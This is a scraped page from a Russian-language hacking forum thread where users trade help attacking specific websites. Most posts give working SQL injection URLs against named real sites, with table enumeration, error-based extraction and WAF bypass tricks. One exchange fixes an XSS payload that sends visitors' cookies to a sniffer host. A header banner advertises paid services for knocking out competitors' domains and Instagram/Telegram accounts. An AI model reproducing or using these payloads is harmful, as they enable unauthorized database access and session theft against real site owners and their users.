УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 3 из 296

103

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#21

05.05.2015, 19:39

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Xsite

Xsite said:
↑
Сори ,надо сразу было выложить )
Обычная ерор базед
Вывод при -v 3

так как там большинство таблиц с длинным именем, и чтобы их вытащить нужно пользоваться функцией CHAR(), получается довольно длинный GET запрос. например, таблица NEWGXE_AppraisePersonComment:

Код:

Code:
http://www.igxe.com/Product/product.cfm?gameid=2338&sid=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>CHAR(78)%2bCHAR(69)%2bCHAR(87)%2bCHAR(71)%2bCHAR(88)%2bCHAR(69)%2bCHAR(95)%2bCHAR(65)%2bCHAR(112)%2bCHAR(112)%2bCHAR(114)%2bCHAR(97)%2bCHAR(105)%2bCHAR(115)%2bCHAR(101)%2bCHAR(80)%2bCHAR(101)%2bCHAR(114)%2bCHAR(115)%2bCHAR(111)%2bCHAR(110)%2bCHAR(67)%2bCHAR(111)%2bCHAR(109)%2bCHAR(109)%2bCHAR(101)%2bCHAR(110)%2bCHAR(116))--&curc=2&pid=3223&tid=1&delivery%20type=3

вываливается то 500 ошибка, то Security: The requested template has been denied access

но если есть желание покрутить руками, то вот:

Код:

Code:
http://www.igxe.com/Product/product.cfm?gameid=2338&sid=1+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+WHERE+table_name+like+(SELECT+TOP+1+table_name+FROM+information_schema.tables+WHERE+table_name+not+in+(SELECT+TOP+1+table_name+FROM+information_schema.tables)))--&pid=3223

или так:

Код:

Code:
http://www.igxe.com/Product/product.cfm?gameid=2338&sid=1+or+1=(SeLect+max(table_name)+from+(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+2+table_name+from+information_schema.tables+order+by+table_name)+order+by+table_name)a)--&pid=3223

больше информации: https://rdot.org/forum/showthread.php?t=826

#22

06.05.2015, 16:54

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Br@!ns

Br@!ns said:
↑
Отлично, а как теперь можете ссылку скинуть?)

Код:

Code:
http://compassrecords.com/xml/songlist.xml.php?id=888%27+div+0+/*!12345union*/+/*!select*/+1,2,3,4,5,6,VERSION/*!12345()*/,8,9,10,11,12,13,14,15--+

жесткий WAF, пока не придумал, как обойти на FROM

#23

06.05.2015, 17:32

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от sunnyfruit

sunnyfruit said:
↑
tvnetcitoyenne.com/journal.php?article=Тут_Инклуд_Прохо дит&phpsessid=98e322270e7ed6ec12ff0d0e9b66cf2a
Я не пойму как он фильтрует Юзер-Агент

фильтрует его WAF, запрещает использовать в юзер-агенте эти символы:

#24

07.05.2015, 14:37

Unknowhacker

Guest

Сообщений: n/a

Провел на форуме:
94006

Репутация: 24

Есть пассивная XSS, читаем куки ">alert(document.cookie) - без вопросов, но когда я подставляю сниффер - куки не приходят.

http://site.ru/?=">(new+image()).src="sniffer.url"document.cookieу же ажрес сниффер через ЧарКод пропускал - нефига ..

#25

07.05.2015, 14:53

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Unknowhacker

Unknowhacker said:
↑
Есть пассивная XSS, читаем куки ">alert(document.cookie) - без вопросов, но когда я подставляю сниффер - куки не приходят.
http://site.ru/?=
">(new+image()).src="sniffer.url"document.cookieу же ажрес сниффер через ЧарКод пропускал - нефига ..

нефига, потому что синтаксис кривой: (new image()).src="sniffer.url"+document.cookie

там должен быть реальный плюс, если это гет параметр, то нужно его заурленкодить, то есть %2b. а между new Image (Image с большой буквы) должен быть реальный пробел, то есть %20

#26

08.05.2015, 18:37

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

как можно заменить в функции /*!12345select*/ знаки '/' и '*', как вообще работает это все?

И еще один вопрос. Можно ли использовть запрос в подзапросе вида: select user_id from(select table_name from information_schema.tables limit 48,1), в целях обхода на фильтр слова в url строке?

#27

08.05.2015, 18:56

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Br@!ns

Br@!ns said:
↑
как можно заменить в функции /*!12345select*/ знаки '/' и '*', как вообще работает это все?

это комментарии в mysql. работает потому что есть символ воскл. знака.

Цитата:

Сообщение от None

когда стоит восклицательный знак и номер версии, то содержимое комментария исполняется, если номер версии равен или больше указанного

тут можно посмотреть еще на возможные варианты: http://websec.ca/kb/sql_injection#MySQL_Specific_Code

#28

09.05.2015, 11:21

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Собственно вопрос, имеется сайт:

.SpoilerTarget" type="button">Spoiler: URL
http://old.[antigoogle]metallprofil.ru/e_mag/'
Выдает:

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 6

Не получается раскрутить sql-injection, есть варианты?

#29

09.05.2015, 11:35

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от xxl

xxl said:
↑
ой... как же вы мне помогли...

Цитата:

Сообщение от kacergei

kacergei said:
↑
Собственно вопрос, имеется сайт:
Spoiler: URL
http://old.[antigoogle]metallprofil.ru/e_mag/'
Выдает:

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 6

Не получается раскрутить sql-injection, есть варианты?

Код:

Code:
http://old.metallprofil.ru/e_mag/'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)='1

#30

09.05.2015, 11:37

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Цитата:

Сообщение от faza02

faza02 said:
↑

Код:

Code:
http://old.metallprofil.ru/e_mag/'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)='1

а как заставить sqlmap пробить?

Страница 3 из 296

103

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход